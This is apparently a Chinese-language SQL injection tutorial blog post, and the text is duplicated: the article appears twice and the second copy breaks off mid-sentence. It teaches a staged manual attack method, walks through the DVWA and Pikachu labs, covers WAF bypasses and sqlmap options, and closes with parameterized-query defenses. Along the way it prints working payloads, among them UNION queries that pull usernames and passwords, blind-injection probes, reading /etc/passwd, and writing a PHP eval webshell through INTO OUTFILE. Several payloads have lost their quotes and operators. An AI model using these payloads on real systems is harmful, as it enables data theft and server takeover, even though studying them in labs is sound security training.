1. 项目概述从“知道”到“实战”的最后一公里“SQL注入实战思路补充”这个标题一看就是给那些已经了解SQL注入基础概念但一到真实环境就有点懵或者总觉得自己的攻击链不完整、效率不高的朋友准备的。我自己在带新人做渗透测试或者打CTF的时候发现一个普遍现象大家都能背出“ or 11 --”这样的万能密码也知道有联合查询、报错注入、布尔盲注这些分类但真给一个稍微有点变化的靶场或者一个真实的CMS往往就卡住了。问题出在哪出在从“知识点”到“实战应用”之间缺了一套系统性的、可操作的“解题思路”。这篇内容就是来补上这“最后一公里”的。我不会再花大量篇幅去讲什么是SQL注入而是直接切入核心当你面对一个可能存在注入的点时你的大脑应该按照怎样的流程去思考、去操作我们会把那些零散的热搜词比如“dvwa sql注入”、“pikachu靶场”、“报错注入”、“手工注入流程”背后共通的方法论抽离出来形成一套从信息收集到最终利用的完整实战框架。无论你是想通关DVWA的各个难度等级还是想挑战CTFshow的Web入门题甚至是分析“文章管理系统”、“avcon综合管理平台”这类真实漏洞这套思路都能帮你快速定位方向避免在错误的方向上浪费时间。简单说这篇内容的目标是让你手里有一张清晰的“作战地图”知道每一步该做什么、为什么这么做、以及可能会遇到什么坑。我们不仅讲“怎么注入”更要讲“怎么高效地、聪明地注入”。2. 核心实战思路拆解四步构建攻击链很多新手在实战中最大的困惑是“无从下手”。看到一个输入框试了几个单引号、and 11没反应可能就放弃了或者盲目上sqlmap一通乱扫。高效的实战思路应该是一个层层递进的侦查与试探过程。我把它总结为四个核心阶段探针、测绘、渗透、拓展。这四个阶段构成了手工注入的完整逻辑链也是理解自动化工具如sqlmap工作原理的基础。2.1 第一步探针——确认注入点与数据库指纹这是所有工作的起点目标是回答两个问题这里真的存在SQL注入吗后端大概是什么数据库1. 初始试探与报错分析不要一上来就用复杂的payload。先进行最基础的输入观察响应。数字型输入1和1 and 11、1 and 12。如果1 and 12返回了与1不同的页面比如空内容、错误页而1 and 11返回正常这强烈暗示存在数字型注入。例如在DVWA Low级别的SQL Injection中这种手法立竿见影。字符型输入一个正常值如admin然后输入admin。这是最关键的一步。你需要像侦探一样仔细检查返回结果直接报错如果页面返回了数据库错误信息例如“You have an error in your SQL syntax...”这不仅是注入存在的铁证更是宝贵的“数据库指纹”。MySQL、PostgreSQL、SQL Server的报错信息格式截然不同。页面内容变化如果页面没有显示错误但内容变成了空白、与正常查询结果不同或者直接跳转到了错误页这也暗示单引号破坏了SQL语句结构。观察注释符效果紧接着尝试admin --注意--后有一个空格或admin #。如果页面恢复了正常显示那几乎可以100%确定存在字符型注入。因为注释符将后续的引号和逻辑都注释掉了使得SQL语句语法正确。2. 数据库类型指纹识别在探针阶段就要有意识地进行识别这决定了后续payload的构造。报错信息MySQL常见“You have an error...”PostgreSQL可能包含“PG::SyntaxError”SQL Server可能包含“Microsoft OLE DB Provider for SQL Server”等。特殊函数试探在确认存在注入后可以用一些数据库特有的函数来验证。 and sleep(5) --如果页面响应延迟了大约5秒很可能是MySQLSLEEP()函数。 and substring(abc,1,1)a --SUBSTRING是通用函数但SUBSTR常见于Oracle/PostgreSQL。WAITFOR DELAY 0:0:5是SQL Server的延时函数。版本查询尝试 and version0 --MySQL/MSSQL或 and version()0 --PostgreSQL。如果报错信息中包含了版本信息那就一举两得了。注意这个阶段要善用浏览器的开发者工具F12查看网络请求和响应有时错误信息不会直接显示在页面上而是隐藏在HTTP响应头或JSON数据里。同时注意观察服务器返回的HTTP状态码如500内部服务器错误。2.2 第二步测绘——摸清数据库结构确认注入点后下一步不是急着拖数据而是要先摸清“战场”地形。你需要知道当前数据库有哪些表表里有哪些列。这就是“测绘”阶段核心是利用数据库的元数据metadata查询。1. 查询字段数ORDER BY这是进行联合查询UNION的前提。使用ORDER BY子句通过索引号来探测查询结果返回的列数。id1 order by 1 --正常id1 order by 2 --正常 ...id1 order by 5 --报错“Unknown column 5 in order clause” 这说明原始查询返回了4列。这是非常关键的一个数字。2. 探测回显点知道了列数例如4列接下来要找出哪些列的内容会显示在页面上。id-1 union select 1,2,3,4 --这里将原查询的id设为不存在的值如-1目的是让原查询结果为空从而使页面只显示我们UNION SELECT的结果。观察页面上哪个位置出现了数字“1”、“2”、“3”、“4”这些位置就是我们可以用来回显数据的地方。例如如果页面显示了“2”和“3”那么后续我们就可以把查询结果放在这两个位置上union select 1, database(), user(), 4 --。3. 获取数据库名、表名、列名这是标准流程但不同数据库语法差异很大。MySQL当前数据库database()所有数据库select group_concat(schema_name) from information_schema.schemata某数据库的所有表select group_concat(table_name) from information_schema.tables where table_schema数据库名某表的所有列select group_concat(column_name) from information_schema.columns where table_schema数据库名 and table_name表名Microsoft SQL Server当前数据库db_name()所有数据库select name from master..sysdatabases(需要逐条爆或使用FOR XML PATH合并)所有表select table_name from information_schema.tablesOracle所有表select table_name from all_tables所有列select column_name from all_tab_columns where table_name表名实操心得在真实渗透测试或CTF中information_schema库MySQL或类似视图是主要目标。但有些题目会过滤这些关键字这就是“双写绕过”infoorformation_schema或使用其他替代方式如sys.schema_table_statisticsin MySQL的应用场景了。在“ctfshow web入门 sql注入”中这类过滤和绕过是常考知识点。2.3 第三步渗透——获取目标数据测绘完成后战场地图已经清晰。现在可以直取目标了。根据第二步获取的表名和列名直接查询数据。id-1 union select 1,username,password,4 from users --这就是最简单的数据获取。但实战中往往没那么简单会遇到各种限制。1. 应对列数不符你想查的users表可能只有username, password两列但原查询有4个回显点。你需要用NULL来填充多余的列保持列数一致。id-1 union select 1,username,password,null from users --(错误列数不对)id-1 union select 1,username,password,null from (select username,password from users) t --(正确通过子查询调整)2. 处理数据截断与显示有时查询结果很长但页面只显示一部分。这时要用到数据库的字符串处理函数。concat(username, :, password)将多个字段合并成一个字符串显示。group_concat(username)(MySQL)将多行结果合并成一行用逗号分隔避免多次查询。substring((select password from users limit 1), 1, 30)当group_concat被禁用或数据太长时用substring分段读取。3. 盲注的渗透策略当页面没有明确回显只有“存在”与“不存在”两种状态布尔盲注或者通过响应时间差异时间盲注来判断时渗透阶段就变成了一个“猜解”的过程。布尔盲注通过and条件判断单个字符。id1 and ascii(substring(database(),1,1))100 --如果页面正常说明数据库名第一个字符的ASCII码大于100。时间盲注通过sleep函数配合if条件判断。id1 and if(ascii(substring(database(),1,1))100, sleep(5), 0) --如果响应延迟5秒说明判断为真。 这个过程极其繁琐必须借助工具如sqlmap的--techniqueB/T或自己编写脚本。在“dc-9靶场sql手工注入流程”中最后阶段往往就需要用到时间盲注或布尔盲注来获取关键信息。2.4 第四步拓展——提升权限与横向移动在CTF或渗透测试中拿到数据库数据如管理员密码往往不是终点。这一步是区分普通脚本小子和真正渗透测试员的关键。1. 文件系统操作读写文件MySQL需要FILE权限。读文件 union select 1, load_file(/etc/passwd), 3,4 --写文件写Webshell union select 1, ?php eval($_POST[cmd]);?, 3,4 into outfile /var/www/html/shell.php --这是“使用sql注入完成cms站点的数据库信息获取”后进一步控制服务器的关键一步。但into outfile对Web目录的写权限和secure_file_priv系统变量要求很苛刻。SQL Server可以使用xp_cmdshell执行系统命令如果被启用通常需要SA权限。2. 执行系统命令这是最高风险的利用方式通常需要数据库本身的高权限配置如SQL Server的xp_cmdshell PostgreSQL的COPY ... FROM PROGRAM或MySQL通过UDF提权。在常规Web漏洞测试中较少直接遇到但一旦存在危害极大。3. 绕过防御机制这才是实战中的常态。你的拓展能力体现在能否绕过WAFWeb应用防火墙和应用程序自身的过滤。大小写/双写绕过UnIoN SeLeCtselselectect。编码绕过URL编码、十六进制编码。union-%75%6e%69%6f%6e或0x756e696f6e。注释符混淆使用/**/代替空格。union/**/select。等价函数/语句替换如果substring被过滤试试mid,substr。如果and被过滤试试URL编码为%26%26。特殊符号利用利用,-,~,!等符号。例如 or !0 --等价于 or 1 --。 在“sql跨库联合注入双写绕过”这类场景中就是综合运用了跨库查询union select ... from other_database.table和双写绕过技术。3. 靶场实战精讲从DVWA到Pikachu理论需要实践来巩固。我们选取两个最具代表性的靶场——DVWA和Pikachu来演示上述四步思路如何落地。你会发现无论靶场怎么变核心思路是相通的。3.1 DVWA SQL注入关卡深度通关DVWADamn Vulnerable Web Application的SQL Injection关卡是经典的入门教材其四个安全等级完美模拟了从无防护到高度防护的环境。Low级别这几乎是不设防的状态。直接应用“探针”步骤。探针输入1立刻看到MySQL的语法错误。输入1 --页面恢复正常。瞬间确认字符型注入数据库为MySQL。测绘使用1 order by 2 --和1 order by 3 --发现order by 2正常3报错确定字段数为2。使用1 union select 1,2 --发现回显点在第二个位置。渗透直接获取数据。1 union select 1, database() --得到数据库名dvwa。1 union select 1, group_concat(table_name) from information_schema.tables where table_schemadvwa --得到表名guestbook,users。接着爆users表的列和内容即可。踩坑记录这里几乎没坑目的是让你熟悉流程。Medium级别这里引入了mysql_real_escape_string函数和下拉菜单POST请求。变化点注入点从GET参数变成了POST表单且输入被转义。但漏洞在于提交的数据是数字id而代码可能使用了$id $_POST[id]没有用引号包裹所以转义符\无效。这是一个典型的“数字型注入无需闭合引号”的场景。探针与测绘使用Burp Suite拦截修改请求。发送id1 and 11SubmitSubmit正常发送id1 and 12SubmitSubmit无结果。确认数字型注入。后续order by、union select步骤与Low级别类似但payload中不需要单引号。关键技巧从字符型到数字型最大的思维转变就是去掉所有用于闭合的单引号。你的payload是直接嵌入到数字上下文中的。High级别这一关将输入限制在了单个会话中并通过LIMIT 1限制了输出。挑战即使你注入了也只能返回一行结果。这限制了UNION SELECT直接爆大量数据。解决方案使用盲注。因为页面有明确的“存在”与“不存在”的反馈查询到用户和未查询到非常适合布尔盲注。你需要用and条件来逐位猜解数据。例如1 and ascii(substring(database(),1,1))100 #。注意这里注释符换成了#因为输入在单引号包裹的字符串里。实操心得High级别是练习手工盲注的绝佳环境。虽然慢但能让你深刻理解盲注的原理。在实际漏洞利用中遇到这种情况会直接上sqlmap的--techniqueB布尔盲注模式。Impossible级别这一关使用了预处理语句Prepared Statements从根本上杜绝了SQL注入。这时你的思路就应该从“如何注入”转变为“为什么它防住了注入”。学习安全的防御手段和攻击手段同等重要。3.2 Pikachu靶场SQL注入模块解析Pikachu靶场的SQL注入模块更贴近CTF和真实漏洞场景引入了各种过滤和变形。数字型/字符型/搜索型注入这考察的是你对注入点上下文的理解。搜索型注入通常发生在LIKE语句中如SELECT ... FROM ... WHERE username LIKE %$input%。闭合方式变为% union select ... --。你需要先闭合前面的%再注释掉后面的%。XX型注入这通常指“INSERT/UPDATE/DELETE”注入也叫“二次注入”。攻击流程是先将恶意数据如admin#存入数据库此时数据被转义安全之后当应用程序从数据库取出该数据并不加过滤地用于另一个SQL查询时注入发生。防御的关键在于所有从数据库取出的数据在进入新SQL语句前仍需视为不可信输入进行处理。“盲注”和“基于时间的盲注”模块这就是对“渗透”阶段盲注策略的专项练习。Pikachu提供了明显的对/错页面或时间延迟反馈让你可以系统地练习substring()、ascii()、if()、sleep()等函数的组合使用编写自动化脚本或熟练使用sqlmap的相关参数。“宽字节注入”模块这是针对使用GBK、GB2312等宽字符集数据库的经典漏洞。当应用使用addslashes或mysql_real_escape_string转义单引号-\时如果数据库连接字符集为GBK我们可以通过输入%df来绕过。因为%df和转义符\%5c会组合成一个GBK编码的汉字“運”%df%5c从而使后面的单引号成功逃逸。防御方法是统一使用UTF-8字符集或使用mysql_set_charset设置连接字符集。4. 高级技巧与深度绕过实战当你掌握了基础流程后就需要面对更复杂的战场环境比如严格的WAF、自定义过滤函数。这时一些高级技巧和深度绕过手法就派上用场了。4.1 非常规注入点挖掘SQL注入不一定只发生在登录框和搜索框。HTTP头部注入User-Agent,X-Forwarded-For,Referer等头部字段如果被不加过滤地记录到数据库就可能成为注入点。测试方法是在Burp Suite中修改这些头部的值为注入payload。Cookie注入原理同上应用程序可能将Cookie值用于数据库查询。JSON/XML参数注入现代Web应用常接收JSON/XML格式的POST数据。注入点可能藏在复杂的JSON结构里。你需要将payload放在JSON的值中发送。ORDER BY后注入像order by id这样的子句如果id参数可控也可能存在注入。但由于语法限制这里通常只能进行布尔盲注或时间盲注。Payload如order by (case when (11) then id else name end)通过改变排序结果来推断条件真假。4.2 自动化与手工结合Sqlmap核心参数精解Sqlmap是神器但会用和精通是两回事。很多人只是sqlmap -u “url” --dbs效率低下且容易被封。1. 精准探测--level和--risk提高检测等级和风险等级可以测试更多的点和payload。对于有防护的目标可以从--level 2 --risk 2开始。--technique指定注入技术。如果你通过手工测试已经知道是布尔盲注直接--techniqueB可以极大提高效率减少无关请求。--dbms如果你已经探明是MySQL使用--dbmsmysqlsqlmap就不会浪费时间去测试其他数据库的payload。--tamper绕过脚本是灵魂。根据WAF类型选择。例如tamperspace2comment将空格替换为/**/between用between替换符号。对于Cloudflare等常见WAF有现成的tamper脚本组合。2. 高效数据获取--batch自动选择默认选项用于非交互式环境。--threads 10使用多线程加快数据获取速度谨慎使用对目标压力大。--search搜索库、表、列。当你不知道具体名称时很有用如--search -C “pass,user”。--sql-shell或--os-shell在成功注入后直接获取一个交互式的SQL命令行或系统shell这是渗透的终极目标之一。但这需要数据库具备相应的高权限。3. 隐蔽与规避--delay 1每个请求延迟1秒降低请求频率避免触发速率限制或警报。--random-agent使用随机的User-Agent头。--proxy通过代理发送请求隐藏真实IP。重要警告Sqlmap的--os-shell功能非常强大它会上传一个用于执行命令的脚本通常是UDF for MySQL或xp_cmdshell for MSSQL。在未经授权的真实网站测试中绝对不要使用此功能这已远超安全测试范畴属于非法入侵行为。仅在你自己完全控制的实验环境如靶场、虚拟机中使用。4.3 云WAF与动态防护绕过思路现代云WAF如阿里云、腾讯云、Cloudflare不再是简单的关键字过滤它们具备行为分析、语义分析能力。1. 混淆与分割注释符内联UNION/**/SELECT-UNION/*aaaa*/SELECT/*bbbb*/1,2,3。用无意义的注释分割关键字。参数污染提交多个同名参数如?id1id2不同中间件解析顺序不同可能绕过WAF的规则匹配。HTTP参数污染HPP类似参数污染在GET/POST/Cookie中同时提交同名参数造成混淆。2. 利用数据库特性MySQL黑魔法利用/*!50000UNION*/ SELECT这是MySQL的特性注释在MySQL版本大于等于5.00.00时才会执行其中的代码WAF可能无法正确解析。字符串拼接‘’(SQL Server),‘||’(Oracle) 将关键字拆开。如SEL’’ECT。十六进制/字符编码将整个查询语句编码。如SELECT-0x53454c454354。或者使用CHAR(83,69,76,69,67,84)来表示SELECT。3. 动态Payload大小写随机化每次请求使用不同的大小写组合。插入冗余空白/换行在关键字中插入%0a换行、%0d回车、%09制表符。使用生僻语法大多数WAF规则集针对常见语法尝试使用不常见的SQL语法结构。4. 资源耗尽型绕过谨慎使用有些WAF有请求体大小限制或检测超时。可以构造一个极其冗长复杂的payload使其超过WAF的处理能力或超时时间从而被放行。但这在实战中风险高容易导致请求失败。5. 防御视角与安全开发建议真正理解攻击是为了更好地防御。作为开发者或安全人员你必须知道如何从根本上杜绝SQL注入。1. 首选方案使用预处理语句参数化查询这是唯一被证明能从根本上防止SQL注入的方法。原理是将SQL语句的结构SELECT * FROM users WHERE id ?与数据?对应的值分开发送给数据库。数据库先编译SQL结构再将数据代入因此用户输入的数据永远不可能改变SQL语句的原有结构。PHP (PDO):$stmt $pdo-prepare(SELECT * FROM users WHERE email :email AND status:status); $stmt-execute([email $email, status $status]); $user $stmt-fetch();Python (SQLAlchemy):from sqlalchemy import text result db.session.execute(text(SELECT * FROM users WHERE id :id), {id: user_id})绝对不要使用字符串拼接来构造SQL语句SELECT * FROM users WHERE id user_id这是万恶之源。2. 严格的输入验证与过滤将预处理语句视为最后一道坚固的防线在此之前还应建立多层校验。白名单验证对于已知有限集合的输入如状态、类型只允许预设的值。例如$order $_GET[order]; if (!in_array($order, [id, name, time])) { $order id; }。类型强制转换对于数字型ID直接转换为整数$id (int)$_GET[id];。最小化权限原则用于连接数据库的账户不应具有FILE、DROP、CREATE等高危权限通常只赋予SELECT、INSERT、UPDATE、DELETE等必要权限。3. 安全的错误处理禁止显示详细错误在生产环境中务必关闭PHP的display_errors将error_reporting设为0或记录到日志文件。自定义一个友好的错误页面而不是将数据库错误堆栈直接抛给用户。使用ORM框架成熟的ORM框架如Laravel的Eloquent, Django的ORM通常内置了预处理语句能大幅降低手写SQL出错的风险。但要注意不当使用ORM也可能产生注入如Laravel中原始查询DB::raw()的使用。4. 纵深防御体系WAFWeb应用防火墙在网络边界部署WAF可以拦截大量已知的、模式化的攻击payload作为一道补充防线。但不能依赖WAF作为唯一的安全措施。定期安全审计与代码扫描使用SAST静态应用安全测试工具扫描源代码使用DAST动态应用安全测试工具扫描运行中的应用定期进行渗透测试。安全编码培训让所有开发人员都深刻理解SQL注入的原理和危害掌握预处理语句的正确用法将安全内化为开发习惯。最后我想说的是SQL注入是一个“古老”但远未过时的漏洞。它在OWASP Top 10中长期占有一席之地。掌握它的攻击手法不是为了去攻击别人而是为了在代码中彻底杜绝它并在安全评估中准确地识别风险。这套从“探针”到“拓展”的四步实战思路更像是一把手术刀帮助你精准地剖析目标。在自家系统上用它来查找漏洞在靶场和CTF中用它来锻炼技艺。永远记住技术是把双刃剑法律的边界和道德的底线是我们每一个从业者不可逾越的红线。
SQL注入实战:从手工注入到自动化工具的核心攻防思路
发布时间:2026/7/1 5:41:01
1. 项目概述从“知道”到“实战”的最后一公里“SQL注入实战思路补充”这个标题一看就是给那些已经了解SQL注入基础概念但一到真实环境就有点懵或者总觉得自己的攻击链不完整、效率不高的朋友准备的。我自己在带新人做渗透测试或者打CTF的时候发现一个普遍现象大家都能背出“ or 11 --”这样的万能密码也知道有联合查询、报错注入、布尔盲注这些分类但真给一个稍微有点变化的靶场或者一个真实的CMS往往就卡住了。问题出在哪出在从“知识点”到“实战应用”之间缺了一套系统性的、可操作的“解题思路”。这篇内容就是来补上这“最后一公里”的。我不会再花大量篇幅去讲什么是SQL注入而是直接切入核心当你面对一个可能存在注入的点时你的大脑应该按照怎样的流程去思考、去操作我们会把那些零散的热搜词比如“dvwa sql注入”、“pikachu靶场”、“报错注入”、“手工注入流程”背后共通的方法论抽离出来形成一套从信息收集到最终利用的完整实战框架。无论你是想通关DVWA的各个难度等级还是想挑战CTFshow的Web入门题甚至是分析“文章管理系统”、“avcon综合管理平台”这类真实漏洞这套思路都能帮你快速定位方向避免在错误的方向上浪费时间。简单说这篇内容的目标是让你手里有一张清晰的“作战地图”知道每一步该做什么、为什么这么做、以及可能会遇到什么坑。我们不仅讲“怎么注入”更要讲“怎么高效地、聪明地注入”。2. 核心实战思路拆解四步构建攻击链很多新手在实战中最大的困惑是“无从下手”。看到一个输入框试了几个单引号、and 11没反应可能就放弃了或者盲目上sqlmap一通乱扫。高效的实战思路应该是一个层层递进的侦查与试探过程。我把它总结为四个核心阶段探针、测绘、渗透、拓展。这四个阶段构成了手工注入的完整逻辑链也是理解自动化工具如sqlmap工作原理的基础。2.1 第一步探针——确认注入点与数据库指纹这是所有工作的起点目标是回答两个问题这里真的存在SQL注入吗后端大概是什么数据库1. 初始试探与报错分析不要一上来就用复杂的payload。先进行最基础的输入观察响应。数字型输入1和1 and 11、1 and 12。如果1 and 12返回了与1不同的页面比如空内容、错误页而1 and 11返回正常这强烈暗示存在数字型注入。例如在DVWA Low级别的SQL Injection中这种手法立竿见影。字符型输入一个正常值如admin然后输入admin。这是最关键的一步。你需要像侦探一样仔细检查返回结果直接报错如果页面返回了数据库错误信息例如“You have an error in your SQL syntax...”这不仅是注入存在的铁证更是宝贵的“数据库指纹”。MySQL、PostgreSQL、SQL Server的报错信息格式截然不同。页面内容变化如果页面没有显示错误但内容变成了空白、与正常查询结果不同或者直接跳转到了错误页这也暗示单引号破坏了SQL语句结构。观察注释符效果紧接着尝试admin --注意--后有一个空格或admin #。如果页面恢复了正常显示那几乎可以100%确定存在字符型注入。因为注释符将后续的引号和逻辑都注释掉了使得SQL语句语法正确。2. 数据库类型指纹识别在探针阶段就要有意识地进行识别这决定了后续payload的构造。报错信息MySQL常见“You have an error...”PostgreSQL可能包含“PG::SyntaxError”SQL Server可能包含“Microsoft OLE DB Provider for SQL Server”等。特殊函数试探在确认存在注入后可以用一些数据库特有的函数来验证。 and sleep(5) --如果页面响应延迟了大约5秒很可能是MySQLSLEEP()函数。 and substring(abc,1,1)a --SUBSTRING是通用函数但SUBSTR常见于Oracle/PostgreSQL。WAITFOR DELAY 0:0:5是SQL Server的延时函数。版本查询尝试 and version0 --MySQL/MSSQL或 and version()0 --PostgreSQL。如果报错信息中包含了版本信息那就一举两得了。注意这个阶段要善用浏览器的开发者工具F12查看网络请求和响应有时错误信息不会直接显示在页面上而是隐藏在HTTP响应头或JSON数据里。同时注意观察服务器返回的HTTP状态码如500内部服务器错误。2.2 第二步测绘——摸清数据库结构确认注入点后下一步不是急着拖数据而是要先摸清“战场”地形。你需要知道当前数据库有哪些表表里有哪些列。这就是“测绘”阶段核心是利用数据库的元数据metadata查询。1. 查询字段数ORDER BY这是进行联合查询UNION的前提。使用ORDER BY子句通过索引号来探测查询结果返回的列数。id1 order by 1 --正常id1 order by 2 --正常 ...id1 order by 5 --报错“Unknown column 5 in order clause” 这说明原始查询返回了4列。这是非常关键的一个数字。2. 探测回显点知道了列数例如4列接下来要找出哪些列的内容会显示在页面上。id-1 union select 1,2,3,4 --这里将原查询的id设为不存在的值如-1目的是让原查询结果为空从而使页面只显示我们UNION SELECT的结果。观察页面上哪个位置出现了数字“1”、“2”、“3”、“4”这些位置就是我们可以用来回显数据的地方。例如如果页面显示了“2”和“3”那么后续我们就可以把查询结果放在这两个位置上union select 1, database(), user(), 4 --。3. 获取数据库名、表名、列名这是标准流程但不同数据库语法差异很大。MySQL当前数据库database()所有数据库select group_concat(schema_name) from information_schema.schemata某数据库的所有表select group_concat(table_name) from information_schema.tables where table_schema数据库名某表的所有列select group_concat(column_name) from information_schema.columns where table_schema数据库名 and table_name表名Microsoft SQL Server当前数据库db_name()所有数据库select name from master..sysdatabases(需要逐条爆或使用FOR XML PATH合并)所有表select table_name from information_schema.tablesOracle所有表select table_name from all_tables所有列select column_name from all_tab_columns where table_name表名实操心得在真实渗透测试或CTF中information_schema库MySQL或类似视图是主要目标。但有些题目会过滤这些关键字这就是“双写绕过”infoorformation_schema或使用其他替代方式如sys.schema_table_statisticsin MySQL的应用场景了。在“ctfshow web入门 sql注入”中这类过滤和绕过是常考知识点。2.3 第三步渗透——获取目标数据测绘完成后战场地图已经清晰。现在可以直取目标了。根据第二步获取的表名和列名直接查询数据。id-1 union select 1,username,password,4 from users --这就是最简单的数据获取。但实战中往往没那么简单会遇到各种限制。1. 应对列数不符你想查的users表可能只有username, password两列但原查询有4个回显点。你需要用NULL来填充多余的列保持列数一致。id-1 union select 1,username,password,null from users --(错误列数不对)id-1 union select 1,username,password,null from (select username,password from users) t --(正确通过子查询调整)2. 处理数据截断与显示有时查询结果很长但页面只显示一部分。这时要用到数据库的字符串处理函数。concat(username, :, password)将多个字段合并成一个字符串显示。group_concat(username)(MySQL)将多行结果合并成一行用逗号分隔避免多次查询。substring((select password from users limit 1), 1, 30)当group_concat被禁用或数据太长时用substring分段读取。3. 盲注的渗透策略当页面没有明确回显只有“存在”与“不存在”两种状态布尔盲注或者通过响应时间差异时间盲注来判断时渗透阶段就变成了一个“猜解”的过程。布尔盲注通过and条件判断单个字符。id1 and ascii(substring(database(),1,1))100 --如果页面正常说明数据库名第一个字符的ASCII码大于100。时间盲注通过sleep函数配合if条件判断。id1 and if(ascii(substring(database(),1,1))100, sleep(5), 0) --如果响应延迟5秒说明判断为真。 这个过程极其繁琐必须借助工具如sqlmap的--techniqueB/T或自己编写脚本。在“dc-9靶场sql手工注入流程”中最后阶段往往就需要用到时间盲注或布尔盲注来获取关键信息。2.4 第四步拓展——提升权限与横向移动在CTF或渗透测试中拿到数据库数据如管理员密码往往不是终点。这一步是区分普通脚本小子和真正渗透测试员的关键。1. 文件系统操作读写文件MySQL需要FILE权限。读文件 union select 1, load_file(/etc/passwd), 3,4 --写文件写Webshell union select 1, ?php eval($_POST[cmd]);?, 3,4 into outfile /var/www/html/shell.php --这是“使用sql注入完成cms站点的数据库信息获取”后进一步控制服务器的关键一步。但into outfile对Web目录的写权限和secure_file_priv系统变量要求很苛刻。SQL Server可以使用xp_cmdshell执行系统命令如果被启用通常需要SA权限。2. 执行系统命令这是最高风险的利用方式通常需要数据库本身的高权限配置如SQL Server的xp_cmdshell PostgreSQL的COPY ... FROM PROGRAM或MySQL通过UDF提权。在常规Web漏洞测试中较少直接遇到但一旦存在危害极大。3. 绕过防御机制这才是实战中的常态。你的拓展能力体现在能否绕过WAFWeb应用防火墙和应用程序自身的过滤。大小写/双写绕过UnIoN SeLeCtselselectect。编码绕过URL编码、十六进制编码。union-%75%6e%69%6f%6e或0x756e696f6e。注释符混淆使用/**/代替空格。union/**/select。等价函数/语句替换如果substring被过滤试试mid,substr。如果and被过滤试试URL编码为%26%26。特殊符号利用利用,-,~,!等符号。例如 or !0 --等价于 or 1 --。 在“sql跨库联合注入双写绕过”这类场景中就是综合运用了跨库查询union select ... from other_database.table和双写绕过技术。3. 靶场实战精讲从DVWA到Pikachu理论需要实践来巩固。我们选取两个最具代表性的靶场——DVWA和Pikachu来演示上述四步思路如何落地。你会发现无论靶场怎么变核心思路是相通的。3.1 DVWA SQL注入关卡深度通关DVWADamn Vulnerable Web Application的SQL Injection关卡是经典的入门教材其四个安全等级完美模拟了从无防护到高度防护的环境。Low级别这几乎是不设防的状态。直接应用“探针”步骤。探针输入1立刻看到MySQL的语法错误。输入1 --页面恢复正常。瞬间确认字符型注入数据库为MySQL。测绘使用1 order by 2 --和1 order by 3 --发现order by 2正常3报错确定字段数为2。使用1 union select 1,2 --发现回显点在第二个位置。渗透直接获取数据。1 union select 1, database() --得到数据库名dvwa。1 union select 1, group_concat(table_name) from information_schema.tables where table_schemadvwa --得到表名guestbook,users。接着爆users表的列和内容即可。踩坑记录这里几乎没坑目的是让你熟悉流程。Medium级别这里引入了mysql_real_escape_string函数和下拉菜单POST请求。变化点注入点从GET参数变成了POST表单且输入被转义。但漏洞在于提交的数据是数字id而代码可能使用了$id $_POST[id]没有用引号包裹所以转义符\无效。这是一个典型的“数字型注入无需闭合引号”的场景。探针与测绘使用Burp Suite拦截修改请求。发送id1 and 11SubmitSubmit正常发送id1 and 12SubmitSubmit无结果。确认数字型注入。后续order by、union select步骤与Low级别类似但payload中不需要单引号。关键技巧从字符型到数字型最大的思维转变就是去掉所有用于闭合的单引号。你的payload是直接嵌入到数字上下文中的。High级别这一关将输入限制在了单个会话中并通过LIMIT 1限制了输出。挑战即使你注入了也只能返回一行结果。这限制了UNION SELECT直接爆大量数据。解决方案使用盲注。因为页面有明确的“存在”与“不存在”的反馈查询到用户和未查询到非常适合布尔盲注。你需要用and条件来逐位猜解数据。例如1 and ascii(substring(database(),1,1))100 #。注意这里注释符换成了#因为输入在单引号包裹的字符串里。实操心得High级别是练习手工盲注的绝佳环境。虽然慢但能让你深刻理解盲注的原理。在实际漏洞利用中遇到这种情况会直接上sqlmap的--techniqueB布尔盲注模式。Impossible级别这一关使用了预处理语句Prepared Statements从根本上杜绝了SQL注入。这时你的思路就应该从“如何注入”转变为“为什么它防住了注入”。学习安全的防御手段和攻击手段同等重要。3.2 Pikachu靶场SQL注入模块解析Pikachu靶场的SQL注入模块更贴近CTF和真实漏洞场景引入了各种过滤和变形。数字型/字符型/搜索型注入这考察的是你对注入点上下文的理解。搜索型注入通常发生在LIKE语句中如SELECT ... FROM ... WHERE username LIKE %$input%。闭合方式变为% union select ... --。你需要先闭合前面的%再注释掉后面的%。XX型注入这通常指“INSERT/UPDATE/DELETE”注入也叫“二次注入”。攻击流程是先将恶意数据如admin#存入数据库此时数据被转义安全之后当应用程序从数据库取出该数据并不加过滤地用于另一个SQL查询时注入发生。防御的关键在于所有从数据库取出的数据在进入新SQL语句前仍需视为不可信输入进行处理。“盲注”和“基于时间的盲注”模块这就是对“渗透”阶段盲注策略的专项练习。Pikachu提供了明显的对/错页面或时间延迟反馈让你可以系统地练习substring()、ascii()、if()、sleep()等函数的组合使用编写自动化脚本或熟练使用sqlmap的相关参数。“宽字节注入”模块这是针对使用GBK、GB2312等宽字符集数据库的经典漏洞。当应用使用addslashes或mysql_real_escape_string转义单引号-\时如果数据库连接字符集为GBK我们可以通过输入%df来绕过。因为%df和转义符\%5c会组合成一个GBK编码的汉字“運”%df%5c从而使后面的单引号成功逃逸。防御方法是统一使用UTF-8字符集或使用mysql_set_charset设置连接字符集。4. 高级技巧与深度绕过实战当你掌握了基础流程后就需要面对更复杂的战场环境比如严格的WAF、自定义过滤函数。这时一些高级技巧和深度绕过手法就派上用场了。4.1 非常规注入点挖掘SQL注入不一定只发生在登录框和搜索框。HTTP头部注入User-Agent,X-Forwarded-For,Referer等头部字段如果被不加过滤地记录到数据库就可能成为注入点。测试方法是在Burp Suite中修改这些头部的值为注入payload。Cookie注入原理同上应用程序可能将Cookie值用于数据库查询。JSON/XML参数注入现代Web应用常接收JSON/XML格式的POST数据。注入点可能藏在复杂的JSON结构里。你需要将payload放在JSON的值中发送。ORDER BY后注入像order by id这样的子句如果id参数可控也可能存在注入。但由于语法限制这里通常只能进行布尔盲注或时间盲注。Payload如order by (case when (11) then id else name end)通过改变排序结果来推断条件真假。4.2 自动化与手工结合Sqlmap核心参数精解Sqlmap是神器但会用和精通是两回事。很多人只是sqlmap -u “url” --dbs效率低下且容易被封。1. 精准探测--level和--risk提高检测等级和风险等级可以测试更多的点和payload。对于有防护的目标可以从--level 2 --risk 